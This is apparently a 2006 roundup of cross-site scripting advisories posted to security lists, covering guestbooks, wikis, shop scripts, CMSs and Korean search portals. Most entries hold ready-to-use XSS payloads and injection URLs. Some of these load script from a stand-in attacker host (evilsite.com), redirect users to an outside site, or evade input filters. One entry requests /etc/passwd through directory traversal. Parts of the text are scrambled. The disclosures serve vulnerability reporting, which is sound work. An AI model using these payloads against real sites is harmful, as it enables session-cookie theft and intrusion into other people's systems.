List of XSS vulnerabilities received between 06/02/06 and 06/11/06. Affected software includes: LabWiki 1.0, LarkinWEB Database Development, Web Site Design Marketing and Advertising System, ASPScriptz Guest Book 2.0 , ParticleSoft Whois v1.0.3, ParticleSoft Wiki v1.0.2, GANTTy v1.0.3, MyBB 1.1.2 New XSS, PBLGuestbook v1.31, ViArt Shop v2.5.5 Free (and possibly Light, Standard, and Enterprise), E-Dating System, vSCAL and vREAL v1.0, Easy Ad-Manager, Ez Ringtone Manager, tikiwiki 1.9.x, Skoom i.List 1.5, OkMall v1.0, QuickLinks v1.1, OKArticles v1.0, iFoto v0.20-06/06/06, phazizGuestbook v2.0, Ticket Booking Script, MobeSpace v2.0, TinyMuw v1.0, Contensis CMS, Daum Search, DaNaWa Search, DreamWiz Search.
cd45e886db0ce8f2d8f10b943fbd01fb80010605ee0312433c715b6e559b2fb5
XSS Vulnerability On LarkinWEB Database Development, Web Site Design Marketing and Advertising System..
Runing HTML Codes, JScript etch...
XSS Vulerability URL : http://www.larkinweb.com/secure/error.asp?msg=[XSS]
Example:
http://www.larkinweb.com/secure/error.asp?msg=<script>window.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg"<
+/script>
Attackers can Hack This System Administrator Cookies and Hacked This System...
Powered / Credit : SPYMETA
MSN & eMail : spymeta@yahoo.com
----------------------------------------------------------------------------------------------------
From: luny@youfucktard.com
To: bugtraq@securityfocus.com
Subject: LabWiki v1.0
LabWiki 1.0
Homepage:
http://www.bioinformatics.org/phplabware/labwiki/index.php
Effected files:
search.php
The search input box does not sanatize user input before dynamically genrating it.
XSS Proof of concept:
"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"
----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
k 2.0 Remote XSS -
-= http://colander.altervista.org/advisory/ASzGB.txt =-
------------------------------------------------------------------
-= ASPScriptz Guest Book 2.0 =-
Omnipresent
May 18, 2006
Vunerability(s):
----------------
XSS Attack
Product:
--------
ASPScriptz Guest Book 2.0
Vendor:
--------
http://www.aspscriptz.com
Description of product:
-----------------------
Guesbook is a free open source guestbook.Simply download it and unzip it and upload it into the root directory of your
server.It is working now.Smilies support it also added in this version.Admin can disable or enable HTML support.Admin
section is also included.
Vulnerability / Exploit:
------------------------
>From line 109 to line 113, there are the vulnerable code:
[...]
GBOOK_UNAME = REQUEST.FORM("GBOOK_UNAME")
GBOOK_EMAIL = REQUEST.FORM("GBOOK_EMAIL")
GBOOK_CITY = REQUEST.FORM("GBOOK_CITY")
GBOOK_COU = REQUEST.FORM("GBOOK_COU")
GBOOK_WWW = REQUEST.FORM("GBOOK_WWW")
[...]
As you can see, the variables:
GBOOK_UNAME
GBOOK_CITY
GBOOK_COU
are not properly sanitized before being used, so a remote attacker can inject arbitrary HTML code.
So, the programmer for delete the bug can modify the source code with a simple replace().
PoC / Proof of Concept of SQL Injection:
----------------------------------------
Not very hard.. :D Just put <script>alert("XSS")</script> in the Name, City and Country fields.
Vendor Status
-------------
[2006/06/05] Vendor Informed!
Credits:
--------
omnipresent
omnipresent@email.it
----------------------------------------------------------------------------------------------------
ParticleSoft Whois v1.0.3
Homepage:
http://www.particlesoft.net/particlewhois/
XSS Proof of concept viaurl injection:
http://whois.particlesoft.net/index.php?do=runcheck&target="><iframe src=http://evilsite.com/scriptlet.html <<"&ext=all
XSS Via input box:
"><iframe src=http://evilsite.com/scriptlet.html <<"
----------------------------------------------------------------------------------------------------
ParticleSoft Wiki v1.0.2
Effected files:
input boxes on editing pages:
XSS Proof of concept:
We notice br tags are allowed, so by using a STYLE attribute using a comment to break up expression we can create a XSS vuln:
Put the following in when editing a page:
<br IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Thanks to Rsnake & Roman Ivanov for the above xss example code.
----------------------------------------------------------------------------------------------------
GANTTy v1.0.3
Homepage:
http://www.gantty.com
Effected files:
index.php
XSS Vulnerabilities PoC:
XSS Vulnerability:
http://www.example.com/index.php?action=login&message=<IMG SRC=javascript:alert('XSS')>+email&lang=
Full path disclosure error:
http://www.example.com/index.php?action=authenticate&lang='
Error: FILE /var/www/username/actions/authenticate.php
----------------------------------------------------------------------------------------------------
// MyBB 1.1.2 New XSS
File :- private.php
Ver. :- $do = $mybb->input['do'];
Line :- 260
Action :- Preview
HTTP Proof :-
/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E&preview=Preview
// Code
<input type="hidden" name="do" value="D3vil-0x1"><script>alert(1);</script>" />
//
PBLGuestbook v1.31
Homepage:
http://www.pixelatedbylev.com/
Effected files:
input boxes of the guestbook.
XSS Vulnerabilities PoC:
I noticed that common tags like <script> are filtered into the words "SCRIPT BLOCKED" in this guestbook, however img tags as well as others go unfiltered in the Name, Email,and Website boxes. In turn, this could cause an XSS
attack to occur. For PoC just enter: <IMG SRC=javascript:alert('XSS')> in any of these boxes.
----------------------------------------------------------------------------------------------------
ViArt Shop v2.5.5 Free (and possibly Light, Standard, and Enterprise)
Authors Site: http://www.codetosell.com/
+-[Examples:]--------------------------------------------------+
XSS:
/forum.php?forum_id="><script>alert('XSS');</script>&category_id=1
/reviews.php?category_id=0&item_id=4&rnd=1149618267&action=1&item_id="><scri
pt>alert('XSS');</script>&category_id=0&recommended=1&rating=0&summary=1&com
ments=1&user_name=1
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 6 June 2006
Author(s) Informed on: 7 June 2006
Author(s) Response: 7 June 2006
Author(s) Fix: 7 June 2006
Authors Fix: http://www.codetosell.com/downloads/xss_fix.zip
JohnC@NoBytes.com
http://www.NoBytes.com
----------------------------------------------------------------------------------------------------
E-Dating System
Homepage:
http://www.scriptsez.net/
Effected files:
Input boxes.
cindex.php
Description:
A Professional dating system that uses flatfiles instead of MySQL.
XSS Vulnerabilities PoC:
The input boxes of sending a message, and editing your profile do not properally filter user input before generating it.
The script add's backslashes to ' and " but we can easily get around this by changing ' into '. forPoC input the
following in anyof the above boxes mentioned:
<IMG SRC=javascript:alert('XSS')>
Full path disclosure error by url injection of trying to read a nonexistant message:
http://www.example.comcindex.php?action=dologin&nav=messagebox&do=read&id=999720979&st=1
Warning: rename(files/rofl/999720979&~@&1.txt,files/rofl/999720979&~@&0.txt): No such file or directory in /home/www/
domain/demo/dating/gmain.php on line 733
We now know the dir /files/username/ is where we can view users profiles, data and messages, this dir is also said tobe chmoded to 777 in the install instructs. Since none of the data was sanatized by input box before being stored in this flatfile, this data will also create XSS examples, plus also lets us view any users private messages in plain text format as well.
Another XSS Vuln via id:
http://www.example.com/cindex.php?action=dologin&nav=messagebox&do=read&id=<IMG SRC=javascript:alert('XSS')>&st=1
----------------------------------------------------------------------------------------------------
vSCAL and vREAL v1.0
Homepage:
http://www.babykatiemedia.com/
Effected files:
index.php
myslideshow.php
XSS Vulnerability via lid variable:
http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>
XSS Vulnerability via myslideshow.php
http://www.example.com/vscal/myslideshow.php?dir=./listings/317/images/&title=listing+317:+1966+Buick+<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>
Chemical Directory v.unknown (doesnt say on website)
Homepage:
http://www.scriptsez.net/
Effected files:
dictionary.php
XSS Vulnerability via keyword variable:
http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]
----------------------------------------------------------------------------------------------------
Easy Ad-Manager v. (unknown, not listed on homepage)
Homepage:
http://www.scriptsez.net
Effected files:
details.php
XSS Vulnerability with full path disclosure:
http://www.example.com/eam/details.php?do=load&mbid=/<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>
Warning: fopen(stats//This is remote text via xss.js located at evilsite.combanner_cookie=visited%3Bvisited%3B.vis):
failed to open stream: No such file or directory in /home/www/domainname/demo/eam/details.php on line 268
Warning: fwrite(): supplied argument is not a valid stream resource in /home/www/domain/demo/eam/details.php on
line 269
Warning: fclose(): supplied argument is not a valid stream resource in /home/www/domain/demo/eam/details.php on
line 270
Warning: Cannot modify header information - headers already sent by (output started at /home/www/domain/demo/
eam/details.php:268) in /home/www/domain/demo/eam/details.php on line 272
----------------------------------------------------------------------------------------------------
Ez Ringtone Manager
Homepage:
http://www.scriptsez.net
Effected files:
player.php
search input box.
XSS Vulnerabilities:
http://example.com/ringtones/player.php?action=preview&id=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>&cat=LG%20Mobiles
The search box doesnt properlly filter user input. Tags like <script> are filtered, and backslashes are added for ' and "
We can get around this by simply using a <img> tag and ' for '. Poc:
<IMG SRC=javascript:alert('XSS')>
----------------------------------------------------------------------------------------------------
This release fixes a recently declared XSS vulnerability. Anyone using tikiwiki 1.9.x should upgrade asap.
http://tikiwiki.org/tiki-read_article.php?articleId=131
----------------------------------------------------------------------------------------------------
[MajorSecurity #10]i.List <= 1.5 - XSS
----------------------------------------
Software: i.List
Version: <=1.5
Type: XSS
Date: June, 8th 2006
Vendor: Skoom
Page: http://skoom.de
Credits:
-------------------------------
David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de
Affected Products:
-------------------------------
i.List 1.5 and prior
Description:
-------------------------------
i.List is a php/mysql TOPLIST script.
Requirements:
-------------------------------
register_globals = On
Vulnerability:
-------------------------------
Input passed to the Inputbox in "search.php", the 'URL' inputbox
and 'ButtonURL' in "add.php" is not properly filtered and verified, before it is used.
This can be exploited to execute evil XSS-code.
Solution:
-------------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
-------------------------------
In the inputbox of /search.php:
Search for: <script>alert("MajorSecurity")</script>
In the inputbox 'URL' of add.php:
Type in as URL: <script>alert("MajorSecurity")</script>
In the inputbox 'ButtonURL' of add.php:
Type in as URL: <script>alert("MajorSecurity")</script>
----------------------------------------------------------------------------------------------------
OkMall v1.0
Homepage:
http://www.okscripts.com/
Effected files:
search.php
XSS Vulnerabilities:
The search inputbox doesnt properally filter using input before generating it. Backslashes areadded but we can easily
evade this.
ForPoC try putting a [imgsrc=lol.jpg]in the search box.
XSS vuln via URLinjection with possible buffer overflow?:
http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
The above PoC creates the error msg:
Warning: fopen(http://xml.amazon.com/onca/xml3?locale=us&t=boxxnetcom-20&dev-t=06464ERBRYHMP1RY3W82&KeywordSearch=a__b_e_&sort=+pmrank&offer=All&mode=classical&type=lite&page=This is remote text via xss.jslocated at evilsite.com&f=xml): failed to open stream: HTTP request failed! HTTP/1.1 500 Server Error in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 59
Warning: feof(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 60
Warning: fread(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 61
and continuously outputs feof() and fread() error messages on the page. Buffer overflow?
------------------------
QuickLinks v1.1
Homepage:
http://www.okscripts.com/
Effected files:
cat.php
XSS Vulnerabilities:
The search inputbox doesnt properally filter using input before generating it. Backslashes areadded but we can easilyevade this. ForPoC try putting [IMG SRC=javascript:alert(XSS)] in the search box.
XSS vuln via URL injection:
http://www.example.com/quicklinks/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
--------------------------------------
OKArticles v1.0
Homepage:
http://www.okscripts.com/
Effected files:
search.php
XSS Vulnerabilities:
The search inputbox doesnt properally filter using input before generating it. Backslashes areadded but we can easilyevade this. For PoC try putting [IMG SRC=javascript:alert(XSS)] in the search box.
XSS vuln via URL injection:
http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
----------------------------------------------------------------------------------------------------
iFoto v0.20-06/06/06
Homepage:
http://ifoto.ireans.com/
Effected files:
XSS Vulnerability:
The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein base64.
The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:alert('XSS');"][/IFRAME]
http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+
----------------------------------------------------------------------------------------------------
phazizGuestbook v2.0
Homepage:
http://www.devhome.de/#english_version
Effected files:
input boxes of name, email, url, text.
XSS Vulnerability:
None of these input boxes sanatize user input before generating it. for PoC put <IMG SRC=javascript:alert(�XSS')> in any of the above boxes.
----------------------------------------------------------------------------------------------------
Ticket Booking Script
Homepage:
http://www.mole.com.ua
Effected files:
input boxes on booking2.php
XSS Vulnerabilities:
The input boxes on booking2.php do not sanatize userinput before geenrating it and then submitting it to a MySQL db. This can causes XSS examples as well as possible SQL injections.
For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of the input boxes
----------------------------------------------------------------------------------------------------
MobeSpace v2.0
Homepage:
http://mobescripts.com/
Effected files:
index.php
The input forms of:
- Profile
- Comments
- Uploading a file to your locker
- Posting in your blog
- Creating a caption for your pic
- Sending PM's
The input boxes of the above do not sanatize user input before generating it. for PoC just trying putting:
<IMG SRC=javascript:alert('XSS')>
--------------------------------
XSS Vulnerability with SQL query error msg:
http://mobespace.com/index.php?browse=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]&q=&update=Search&page=search&search=Search+DataBase
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'This is remote text via xss.js located at evilsite.comPHPSESSID=004baf662f7d63889816e037a6bb2e56 WHERE name LIK
-------------------------------
Possible directory traversal via rss feed:
http://www.example.com/index.php?page=rss&uid=/../../../../etc/passwd/
----------------------------------------------------------------------------------------------------
TinyMuw v1.0
Homepage:
http://www.l0j1k.com/tinyMuw/index.php
Effected files:
quickchat.php input box
videoPage.php
Input isn't sanatized before being generated in the quickchat.php chatbox. For PoC try putting:
<IMG SRC=javascript:alert('XSS')> in as your comment.
Full path disclosure error via URL Injection:
http://www.example.com/tinyMuw/videoPage.php?id=28'
Fatal error: Using $this when not in object context in /home/user/public_html/tinyMuw/tinyMuw/video.php on line 18
----------------------------------------------------------------------------------------------------
Hello,
I have discovered a XSS vunerability in the Contensis
CMS.
Input passed to the "search" parameter when performing
a search and various fields when using the search isn't properly sanitised ...
The vendors own site was tested in Windows Internet Explorer - the search funstion did not work at all in my versions of Safari or Firefox:
http://www.contensis.net
Code example: <script>alert('hello world');</script>
thanks
smigoftheDump
----------------------------------------------------------------------------------------------------
Title:
[Kil13r-SA-20060609-1] Daum Search Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/09 - Discovery
2006/06/09 - Vendor notification
2006/06/09 - Release
Affected version:
Not affected version:
Description:
Daum is internet portal site, but that has vulnerability.
It can run arbitrary Javascript code by end user in search engine.
If victim execute arbitrary Javascript code, attacker can steal victim's cookie.
Proof of Concept code:
None
Proof of Concept example:
None
Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/daumxss.jpg
----------------------------------------------------------------------------------------------------
Title:
[Kil13r-SA-20060609-2] DaNaWa Search Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/09 - Discovery
2006/06/09 - Vendor notification
2006/06/09 - Release
Affected version:
Not affected version:
Description:
DaNaWa is price comparison site, but that has vulnerability.
It can run arbitrary Javascript code by end user in search engine.
If victim execute arbitrary Javascript code, attacker can steal victim's cookie.
Proof of Concept code:
None
Proof of Concept example:
None
Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/danawaxss.jpg
----------------------------------------------------------------------------------------------------
Title:
[Kil13r-SA-20060609-3] DreamWiz Search Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/09 - Discovery
2006/06/09 - Vendor notification
2006/06/09 - Release
Affected version:
Not affected version:
Description:
DreamWiz is internet portal site, but that has vulnerability.
It can run arbitrary Javascript code by end user in search engine.
If victim execute arbitrary Javascript code, attacker can steal victim's cookie.
Proof of Concept code:
None
Proof of Concept example:
None
Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/dreamwizxss.jpg
----------------------------------------------------------------------------------------------------